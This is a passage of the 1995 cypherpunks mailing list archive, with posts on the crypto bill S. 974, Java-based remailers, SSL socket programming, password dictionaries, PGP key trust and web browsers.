in sponsoring this kind of endeavor (particular corporations,
although that would be a bit paradoxical I admit), please 
send me email.

For example, if someone could get me the name/phone/email address
of whoever chaired that panel on Anonymity a few years ago 
at the Conference on Freedom and Privacy (Helsingius and
Gilmore were panelists), I would greatly appreciate it.

many thanks--


~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 21 Jul 95 12:17:35 PDT
To: cypherpunks@toad.com
Subject: New Form of DOS Attack
Message-ID: <199507211917.PAA01722@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Apropos of nothing...

Suppose that you are in charge of a separatist compound/Blacknet POP/Meth Lab and you are worried that The FBI/BATF/DEA/FEMA/UN jackbooted thugs with their black helicopters are planning a little "dynamic entry."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 21 Jul 95 15:21:22 PDT
To: frissell@panix.com
Subject: Re:  New Form of DOS Attack
Message-ID: <9507212224.AA05214@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>If you want to deny the Feds the opportunity for some energetic service of process,
>all you have to do is hire Rodney King to move in.  Once he is onsite, the Feds
>will be helpless.  Just keep your Greenpeace Special (tm) sat cams focussed 
>on old Rodney and you have absolute immunity from all incursion.

Err, hasn't he just been indicted again?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 21 Jul 95 12:27:44 PDT
To: cypherpunks@toad.com
Subject: Re: Cyberporn on NPR today
In-Reply-To: <3uopsm$cts@life.ai.mit.edu>
Message-ID: <9507211927.AA00508@toast>
MIME-Version: 1.0
Content-Type: text/plain


>But I expect it to focus on the technology questions, not the shrill
>"Save our children from the plague..." hysteria.

Only two callers through, first one should have hung up when he heard
all of his arguments made (better) in the first half hour.  Second
caller asked whether the Pynchon mailing list he's on would have to
censor itself if the Exon amendment passed (seemed a decent point -
succinct too).

The rest of the time was the same old political debate with a few
moments about Surfwatch.  Equal time given to the opposition, who
spoke about the horrors of unspeakable bestiality, rape, etc.

-- 

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 21 Jul 95 13:37:47 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Java (was Netscape: the big win)
Message-ID: <9507212034.AA00995@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  So, what would be a "cypherpunk" thing you could do with Java?  I
>  know I can use it to download little applets to my system to do
>  animations.  What can it do to enhance my privacy?  What would be
>  the Java equivalent of PGP?

How about the old-standbys:  remailers.  Mixmaster is definitely where the  
technology is at, but it requires a client to use...  Of course, with Java,  
there is the potential that _any_ user from any platform could connect to the  
Mixmaster Web page, get the client software, and start using the remailer  
network.  Without having to compile, know anything, etc...

If a Mixmaster client were available in Java (and I'm pretty sure it can be  
done) then suddenly everyone who previously could only use the penet server  
can now also use Mixmaster.  With more people using the remailer network, all  
of them with Java clients, the possibility of for-pay remailers could become  
reality (no promises that you'll get rich though).

There are many crypto-anarchy applications as well:

Key cracking.  If you can write a key-cracker and keyspace fetcher in Java,  
then people can join key cracking efforts as easily as looking up a URL.  It  
may not be nearly as efficient as the highly optimized C versions used in the  
current RC4-40 efforts, but there's going to be millions of potential workers  
this way.  If you were charging money to break keys (or you were looking for  
keys that are very valuable to you), you could set up the worker client to  
accept e-cash in return for searching keyspace "Click here to earn money  
while you aren't using your machine..."   Ensuring that workers are actually  
searching the keyspace and other implementation details is left as an  
exercise for the reader.

e-instrument or information exchanges, with Java interfaces for bidding,  
buying, selling, etc...

DataHavens, which would probably require complex (internally) software to use.

I'm sure the online casino people are salivating over the prospects too...

Basically any fancy crypto application that requires a custom client to  
operate...  Since its platform independent, efforts will be put to better use  
as well.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 21 Jul 95 12:41:49 PDT
To: cypherpunks@toad.com
Subject: New Form of DOS Attack
Message-ID: <199507211941.PAA06535@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Apropos of nothing...

Suppose that you are in charge of a separatist compound/Blacknet POP/Meth Lab and you are worried that The FBI/BATF/DEA/FEMA/UN jackbooted thugs with their black helicopters are planning a little "dynamic entry."

If you want to deny the Feds the opportunity for some energetic service of process, all you have to do is hire Rodney King to move in.  Once he is onsite, the Feds will be helpless.  Just keep your Greenpeace Special (tm) sat cams focussed on old Rodney and you have absolute immunity from all incursion.

Too bad we can't clone him.

DCF

"Goodby cruel world, I'm off to join the circus.  Hey, Mr. Barnum save a place for me."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 21 Jul 95 12:48:27 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Something occured to me
In-Reply-To: <Pine.ULT.3.91.950721113352.5103A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.SUN.3.91.950721154315.14473A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Robert A. Hayden wrote:

> When the republicans took over the congress, they instituted that 
> Contract on America.   One of the first laws that was passed (by both 
> parties, I might add) was a law that made lawmakers abide by the same 
> laws that "normal" people abide by.

If you believe that...

Well, it is true, under certain limited circumstances, but it doesn't 
make them criminally liable for writing bad laws, nor can it.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 21 Jul 95 12:51:50 PDT
To: ben@reston.opnsys.com
Subject: Re: Louie Freeh
In-Reply-To: <Pine.A32.3.91.950721125034.18393A-100000@reston.opnsys.com>
Message-ID: <Pine.SUN.3.91.950721154444.14473B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995 ben@reston.opnsys.com wrote:

>     I was just listening to the G. Gordon Liddy Show, he was talking to a 
> reporter for the American Spectator, which has a piece on our favorite 
> FBI director Freeh. From the sound of the reporter the story is very 
> damning, on everything from Waco to the entrapment of Malcolm X's 
> daughter.

Having experience using American Spectator as a source for research 
papers, I can state without any doubt in my mind that anything I read in 
AS I attempt to find proof of their claims somewhere else.

Not to say that Freeh is good, or that the claims aren't true this time 
(I haven't read it, yet..), but their articles in the past have had 
glaring lies^H^H^H^H inaccuracies.  It's like reading the traditional 
liberal media... they'll twist anything to fit their preconceptions.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rross@sci.dixie.edu (Russell Ross)
Date: Fri, 21 Jul 95 14:48:59 PDT
To: Andre Turgeon <andre@oscar.cs.byu.edu>
Subject: Re: Problem synchronizing sockets...
Message-ID: <v01520d00ac35d2195066@[144.38.16.209]>
MIME-Version: 1.0
Content-Type: text/plain


>        I'm a newbie at socket programming so this is probably going to
>be an easy question (I hope). I've been developing a client/server
>project using SSLeay and I'm having problems synchronizing my messages.
>More specifically, I use a combination of SSL_read and SSL_write to
>exchange messages between my client and server. The problem is that my
>client is reading (SSL_read) before the server is done writing and reads
>an empty buffer. This does not occur all the time but often enough to
>make things quite unreliable... I've tried using the select() command
>but that doesn't solve it. Help.....
>
>        Andre

This is generally true of sockets programming.  You don't know that you'll get
as many bytes as you request.  The simplest solution is to loop your read
calls until you get what you need.  See BSD Sockets: A Quick & Dirty Primer
for a sample solution.  The URL is http://www.ntua.gr/unix/sockets.html

-----------------------------------------------------------
Russell Ross                     email: rross@sci.dixie.edu
1260 N 1280 W                    voice: (801)628-8146
St. George, UT 84770-4953
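
The read loop suggested in the reply above, as an added example that is not part of the original thread: it uses Python over a plain stream socket pair as a stand-in for SSL_read/SSL_write, which can likewise return fewer bytes than requested. The 4-byte length prefix, the function names and the sample payload are assumptions made for the illustration.

```python
import socket
import struct
import threading
import time


class ConnectionClosed(Exception):
    """The peer closed the stream before the expected bytes arrived."""


def recv_exact(sock, n):
    """Call recv() repeatedly until exactly n bytes have been collected."""
    chunks = []
    remaining = n
    while remaining > 0:
        chunk = sock.recv(remaining)      # may return anywhere from 1 to remaining bytes
        if not chunk:                     # b"" means the peer closed, not "try again"
            raise ConnectionClosed(f"wanted {n} bytes, got {n - remaining}")
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def frame(payload):
    """Prefix the payload with its length so the reader knows how much to wait for."""
    return struct.pack("!I", len(payload)) + payload


def recv_msg(sock, max_len=1 << 20):
    """Read one length-prefixed message; reject absurd lengths before allocating."""
    (length,) = struct.unpack("!I", recv_exact(sock, 4))
    if length > max_len:
        raise ValueError("declared length exceeds limit")
    return recv_exact(sock, length)


def demo():
    """Send one framed message in 50-byte pieces, close, and read it back."""
    writer, reader = socket.socketpair()
    payload = b"constructed sample message " * 8   # constructed test data
    data = frame(payload)

    def dribble():
        # A slow sender: the reader is always ahead of the writer.
        for i in range(0, len(data), 50):
            writer.sendall(data[i:i + 50])
            time.sleep(0.01)
        writer.close()

    t = threading.Thread(target=dribble)
    t.start()
    message = recv_msg(reader)            # complete despite arriving in pieces
    try:
        recv_msg(reader)                  # nothing more is coming
        saw_close = False
    except ConnectionClosed:
        saw_close = True
    t.join()
    reader.close()
    return message, saw_close


if __name__ == "__main__":
    msg, closed = demo()
    print(len(msg), "bytes received; peer close detected:", closed)
```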






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Fri, 21 Jul 95 15:05:27 PDT
To: cypherpunks@toad.com
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <300f5b5a.flight@flight.hrnowl.lonestar.org>
Message-ID: <7pBEwkkAs2IH084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 21 Jul 95 8:46:26 -0600,
Paul Elliott <paul.elliott@hrnowl.lonestar.org> wrote:

> Many of the leaders of the major net civil liberties organizations have made
> statements concerning SB 974. They seem to agree that no action alert
> or coalition on SB 974 should be formed at this time.  [...]

> I remain concerned about this bill and am not satisfied with the response
> to this bill.

Your points are well taken, but I'm still in favor of concentrating
on the Exon bill until such time as SB 974 shows any signs of support
from other politicians.  Both bills are preposterous, of course:
unconstitutional and unenforceable.  There's one particularly absurd
aspect to SB 974 that I haven't seen mentioned on the Cypherpunks
list, possibly because it goes without saying.  I'll say it anyway,
first quoting the relevant portion of the bill:

`Sec. 1030A. Racketeering-related crimes involving computers
 `(a) It shall be unlawful    [...(1) snipped -- ADW]
 `(2) to distribute computer software that encodes or encrypts
      electronic or digital communications to computer networks that
      the person distributing the software knows or reasonably should
      know, is accessible to foreign nationals [...]

One area where the U.S. has retained strong international competitiveness
is its colleges and universities.  The number of these institutions that
have no foreign nationals enrolled is *damn* small, and largely comprises
"Ace's Truck Driving College" and the like.  Foreign nationals who are in
this country to attend college are exempt from the usual I-9 employment
restrictions; hence, many are also employed at full-time summer jobs,
internships (in government or the private sector), teaching assistantships,
or work-study positions, which may involve access to computer networks.
(Many foreign nationals complete medical residencies in U.S. hospitals,
for example.)

Preventing these people from having access to crypto software is simply
impossible.  This bill would make criminals out of thousands of network
administrators and MIS types, simply for having crypt() or Norton Diskreet
around.  If the bill gains any momentum whatsoever, I expect howls of
protest from the academic world.  I'm not sure a megabuck lobbying effort
by private industry will be necessary:  letters from Computing Services
honchos at some prestigious schools/hospitals/corporations should induce
even the most technically clueless congressdroids to pull their heads out
of their asses on this issue...(OK, maybe not Jamf-^H^Hes Exon, but enough
of 'em to prevent the bill's passage.)

Anyway, I'm glad nobody's suggested a Cypherpunk SB 974 infomercial,
financed "by each according to his ability to pay," as happened during
the Clipper debate...maybe the list *is* evolving...:-)

OK, back to your regularly scheduled Trans- and Cross-Continental Realtime
Virtual Kneecapping & Interface Flamefest, a perennial Cypherpunk favorite!


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBAh3FRRFMq4NZY5AQGDswP+KwtgTTnZszFOsHAUIqM/UEftkBLmnKJs
kyFnhnqyYk+Oe2CS7pqjrV36O3XqvnFvJx6RzPdCgcR1J97ytjP7izACLoYHSjVR
Fzsedf5SxynppZqAlTMz1dWozyO28F0RcTvmPG+Aid0EtXOgdii90MCH93Z7XC4o
iViIX46al84=
=519b
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Gorsuch <chrisg@chrisg.itg.ti.com>
Date: Fri, 21 Jul 95 14:20:19 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <199507212117.QAA00160@chrisg.itg.ti.com>
MIME-Version: 1.0
Content-Type: text/plain



   The crack library points to some dictionaries which have not only real and
"imagined" (literary) words, but also words from other languages as well.
All in all a good resource.  -see adams message for pointers

   However, the reason I write is if you decide to add users' previously used
passwords to the dictionary, make sure your "appendages" to the dictionary
are secured.  Users are notorious for forgetting to change or reusing on 
other machines the passwords from various servers.  The advantage is that
your users will never be able to reuse their old passwords.  The disadvantage
is that your admins can attempt to hack other machines using these passwords.

   A "cryptographic" solution would be to simply store a hash of the password
rather than the password itself in the "appended" dictionary.  A CRYPTOGRAPHIC
solution would be to use one time passwords :).

Chris Gorsuch
chrisg@ti.com 
*I am not responsible for the content of the above message :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Fri, 21 Jul 95 10:55:36 PDT
To: lethin@ai.mit.edu (Rich Lethin)
Subject: Re: Cyberporn on NPR today
In-Reply-To: <9507211504.AA22710@grape-nuts>
Message-ID: <m0sZOiZ-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


> Talk of the Nation on NPR is having a call-in program this afternoon
> on the "pervasiveness of cyberporn".  I think it's 1:00 or 2:00.
> Crypto-relevance... 4 horsepeople... 

That will be Talk of the Nation -- Science Friday.

You can do lots worse than Ira Flato, the host. 

But I expect it to focus on the technology questions, not the shrill
"Save our children from the plague..." hysteria.

- -- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMBAObxqU5+N/mI7JAQHpEQP+KNyxSKOylBZKtLeCzhFYTWjpKE1lu25b
tGbBxwII5O4Ba5/g1pCYCWYkwFI5ZvXJg4xEu6XdKE8lz3HwSSl6lMXGDLtqTmYF
IrwOjcrnkD36EliwXsX7V1chNjfOSFyE9IDWG5RV9S1qBTSbTMVbUHA3w+A2ejgL
YKaJv97iB/A=
=a8iN
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Fri, 21 Jul 95 13:40:02 PDT
To: cypherpunks@toad.com
Subject: "Hey Phil!  Stop telling people *not* to use PGP!"  (plus: "help me with my PGP
Message-ID: <i8VL9c1w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu> writes:

>   And I say "No no no, using a key which you got through the Net is better 
> than using no key at all, just be aware that if someone *really* wanted
> to spy on you that they could have tampered with it.  When you see Cousin
> Joe next Christmas you can compare keys with him and make sure you have the
> right one."

I suppose one could always send Cousin Joe an encrypted message and see if he
can read it.....


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMBAPON74r4kaz3mVAQGoXQP9HYxFLJ3BEs5YhJ3Yaf3NGbUTIwB3pBw+
QNAzqiuKcNQmQ8/EZ160FK8JeeKAwMcSHA/a+/coG5+82DEiDfbkyLRXJK60c+j3
jVksrm3jxd9nfBk1SrWddHj6SYg8+0Rxz9aNFkfmwcNWJVPNcDkwvzAHZ1wO9rqZ
gPaq8xIjfAA=
=1I7d
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Fri, 21 Jul 95 13:50:03 PDT
To: jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT)
Subject: Re: "Hey Phil!  Stop telling people *not* to use PGP!"  (plus: "help
In-Reply-To: <i8VL9c1w165w@voxbox.norden1.com>
Message-ID: <qLwL9c1w165w@voxbox.norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

jgrubs@voxbox.norden1.com (Jim Grubs, W8GRT) writes:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu> writes:
> 
> >   And I say "No no no, using a key which you got through the Net is better 
> > than using no key at all, just be aware that if someone *really* wanted
> > to spy on you that they could have tampered with it.  When you see Cousin
> > Joe next Christmas you can compare keys with him and make sure you have the
> > right one."
> 
> I suppose one could always send Cousin Joe an encrypted message and see if he
> can read it.....

PS -- To make sure you hear back from him, tell him in the message that you
won $50,000,000 in the Italian lottery (which doesn't notify the IRS). If you
also hear back from the IRS,  let us know -- FAST.





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: http://norden1.com/~jim/sylvania.html

iQCVAwUBMBASNt74r4kaz3mVAQFz9wP+Ks1WkIJcBBUAX5QpJbJZDc+ECElDIh2a
sZ0gbcUrGwUDcCUdXtcmYnmewlbz6BC1E3BNi6Mrav3Dqy5tDretl6ZcU3xvoCg7
MQplUgildLu4/BvFLDPzaJa73ngQvIRpXfq0/YZ2lNOMVjUiTc5VER6OSYPiZI4S
cOFEdEkQXLk=
=LW4l
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Fri, 21 Jul 95 13:58:51 PDT
To: paul.elliott@Hrnowl.LoneStar.ORG (Paul Elliott)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <300f5b5a.flight@flight.hrnowl.lonestar.org>
Message-ID: <199507212057.QAA15341@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


We've not "bowed out" on this bill, it's just not significant enough a 
threat (yet) to warrant stirring up a lot of activism about it - which 
would detract from the focus on the CDA and its clones.

We'll be tracking this bill and will certainly help form a campaign against 
it if it looks to be going anywhere. In the meantime, we're issuing an 
analysis of it, and will keep the net informed.

--
<A HREF="http://www.eff.org/~mech/">          Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>   Online Services Mgr.      



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ruf@osiris.cs.uow.edu.au (Justin J. Lister)
Date: Sat, 22 Jul 95 00:42:42 PDT
To: ids@uow.edu.au (Intrusion Detection System Mailing List)
Subject: Searching for reference
Message-ID: <m0sZMBI-0005qDC@osiris>
MIME-Version: 1.0
Content-Type: text


I am trying to find some pointers to a recent UK financial services report
of the Foresight Program. It deals with fraud detection systems, an 
outline appeared in 'The Australian' 9th May 1995 - by Vanessa Houlder from
Financial Times, London.

Additionally any pointers to :-

	Jason Kingdon of SearchSpace.

	Barclay and Touche Ross (Mr Mark Tantum) - Fraud 2000 system.

	Visa International's 
		- Cardholder Risk Identification System (CRIS)
		- Merchant Risk Identification System (MRIS)

	Cooper & Lybrand's (System Name?) - Using Netmap visualisation 
	software (by Active Analysis) in conjunction with neural net & 
	knowledge based system.

Additionally any information in regard to such systems would be useful.
TRW, Mastercard, etc..

So far have been unable to find any details via gopher, netfind searches
and would like to avoid making international phone calls.
-- 
+---------------------+--------------------------------------------------+
|  ____       ___     | Justin Lister                 ruf@cs.uow.edu.au  |
| |    \\   /\ __\    |     Center for Computer Security Research        |
| | |) / \_/ / |_     | Dept. Computer Science      voice: 61-42-214-327 |
| |  _ \\   /| _/     | University of Wollongong      fax: 61-42-214-329 |
| |_/ \/ \_/ |_| (tm) |     Computer Security a utopian dream...         |
|                     |       Disclaimer: dreaming is at own risk        |
+---------------------+--------------------------------------------------+



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Fri, 21 Jul 95 15:05:11 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <300f5b5a.flight@flight.hrnowl.lonestar.org>
Message-ID: <9507212204.AA16780@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Paul Elliott writes:
> The best time to persuade these "experts"
> will be before they make any public statements about the bill in the
> subcommittee hearings and their positions are locked by pride not 
> wanting to publicly change their positions. Thus we should be contacting
> these people now, and we may have a chance to nip SB 974 in the bud.

Sen. Kyl (Arizona) became a co-sponsor of S.974 yesterday (7/20/95). He,
at least, appears to believe the bill is still heading somewhere.

(Ref: Congressional Record, pg. S10427)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 21 Jul 95 16:18:35 PDT
To: Phil Fraering        <pgf@tyrell.net>
Subject: Re: The OS wars and DOOM...
Message-ID: <9507212317.AA01248@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Apps have migrated from Unix to the Mac and the PC before in the
>  past. In the further past, this has included curses and
>  other-types-of-text-control packages such as PC versions of Emacs
>  and nethack and the like.

>  Of course, this was not done with graphical programs; everyone
>  knows that graphics isn't Unix's strong suit, and what it has is
>  so different from the PC, etc., blah, blah,...

>  Except that for the past two or three years, it's been WRONG.
>  One of the hottest games on the PC, DOOM, was originally written
>  in Nextstep (a Unix variant, and a ghetto even amidst the "ghetto"
>  of Unix) and then ported to the PC.

Being a resident of the NeXTSTEP ghetto, please allow me to chime in.  While  
Doom is written on NeXTSTEP boxes, that's about all the game itself has in  
common with it.  The game is carefully written in strict ANSI-C and any  
portions that must be OS specific are separate.  They have a VGA emulator  
that allows them to run Doom on non-DOS boxes.  All of the platform  
independence comes from the discipline of the developers (who are extremely  
talented, IMHO).  In contrast, Lotus Improv was NeXT native and had to be  
completely rewritten over a period of at least 3 years to get it to work on  
Windoze.

The primary reason Id software (and Trilobyte among others) uses NeXTSTEP  
(over DOS or any other unix environment) is because it lets them write  
in-house tools like map and monster editors really fast (and really slick  
too!).  On any other platform it would take much more time and effort to  
write the tools and they probably wouldn't be as nice either.  Since these  
tools aren't being sold to customers, it doesn't matter that they only run on  
a dead-end niche software platform that costs $1000 per user (and $5k per  
developer!!).

This strategy makes sense for a commercial video game where there is the  
opportunity to save major amounts of time and effort through the use of  
custom tools (and the incentive of major amounts of cash if it is  
successful).  However, this strategy definitely doesn't make sense when you  
are talking about a cypherpunk donating their spare time to write a freeware  
(or copyleft) crypto app.  Better would be to just write the app for the  
target platform or write it using an environment that is designed to be  
platform independent (like Java).


andrew
...able to work cypherpunks relevance into virtually any thread......and uses  
Python instead of NeXTSTEP when writing stuff that needs to be  
platform-independent...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Fri, 21 Jul 95 18:04:27 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Louie Freeh
In-Reply-To: <Pine.SUN.3.91.950721154444.14473B-100000@rwd.goucher.edu>
Message-ID: <Pine.3.89.9507211856.E26107-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Jon Lasser wrote:

> Having experience using American Spectator as a source for research 
> papers, I can state without any doubt in my mind that anything I read in 
> AS I attempt to find proof of their claims somewhere else.

That's a good policy, regardless of the source.  Respectable journalists 
just don't trust only one source - they find corroboration from good, 
reliable sources.  Too bad most journalists have no idea what 
"respectable" and "professional" mean anymore.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Fri, 21 Jul 95 18:05:06 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Java (was Netscape: the big win)
In-Reply-To: <9507212034.AA00995@ch1d157nwk>
Message-ID: <Pine.3.89.9507211802.F26107-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Andrew Loewenstern wrote:

> If a Mixmaster client were available in Java (and I'm pretty sure it can be  
> done) then suddenly everyone who previously could only use the penet server  
> can now also use Mixmaster.  With more people using the remailer network, all  
> of them with Java clients, the possibility of for-pay remailers could become  
> reality (no promises that you'll get rich though).

The problem, Java only runs on a pretty restricted set of software.  I 
don't have to be running Solaris to take advantage of penet.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bigdaddy@ccnet.com
Date: Fri, 21 Jul 95 19:17:22 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Netscape the Big Win(dows)
In-Reply-To: <199507211829.OAA08315@bb.hks.net>
Message-ID: <Pine.3.89.9507211942.A7260-0100000@ccnet3>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Lucky Green wrote:
> Once someone tries Anarchie for ftp, or one of the enhanced (current
> leader seems to be Y.A.) Newswatchers for USENET, there is no going back
> to just Netscape. 
	In my own experience, the Mac newsreaders that I have 
tried (mainly Nuntius and Newswatcher) have felt incredibly slow compared 
to tin. What, IMHO, would be a good step forward would be Mac versions of 
UNIX packages like pine and tin...preferably with AppleScripts that 
implement the same functionality as the PineSign and TinSign scripts 
recently distributed here. I don't know about the Netscape-addicted 
masses, but it would make my life a lot easier. :-)

David Molnar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 21 Jul 95 19:47:42 PDT
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: Netscape the Big Win(dows)
Message-ID: <v01520d00ac36215c73b5@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:47 7/21/95, Damaged Justice wrote:
>Au contraire. I finally got the chance to use Netscape, and although I AM
>impressed, I still prefer Lynx. Most folks will probably call this pointless
>stubborness, elitism, I don't care. Graphics are too damn slow at any
>speed and personally, I have no need (or desire) to have my net connection
>slow to a snail's crawl just to make it "look nicer".

Ever tried turning off "autoload images"?

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 21 Jul 95 19:47:47 PDT
To: bigdaddy@ccnet.com
Subject: Re: Netscape the Big Win(dows)
Message-ID: <v01520d01ac3621ac8676@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:15 7/21/95, bigdaddy@ccnet.com wrote:

>        In my own experience, the Mac newsreaders that I have
>tried (mainly Nuntius and Newswatcher) have felt incredibly slow compared
>to tin.

Depends on the load on the host, the speed of your link, the speed of your
Mac, and if you want to trade features for speed at that given moment.

>What, IMHO, would be a good step forward would be Mac versions of
>UNIX packages like pine and tin...

The human interface is the whole point behind Newswatcher and Nuntius. As
for Mac users that prefer tin, they already have an implementation
available. It is called telnet.

>preferably with AppleScripts that
>implement the same functionality as the PineSign and TinSign scripts
>recently distributed here.

I have been thinking about writing AppleScripts that link Newswatcher with
PGP. Unfortunately, there is another project that has precedence. Still, as
with most great utility software not yet available, you can always try to
write it yourself.

Have fun,


-- Lucky Green <mailto:shamrock@netcom.com>
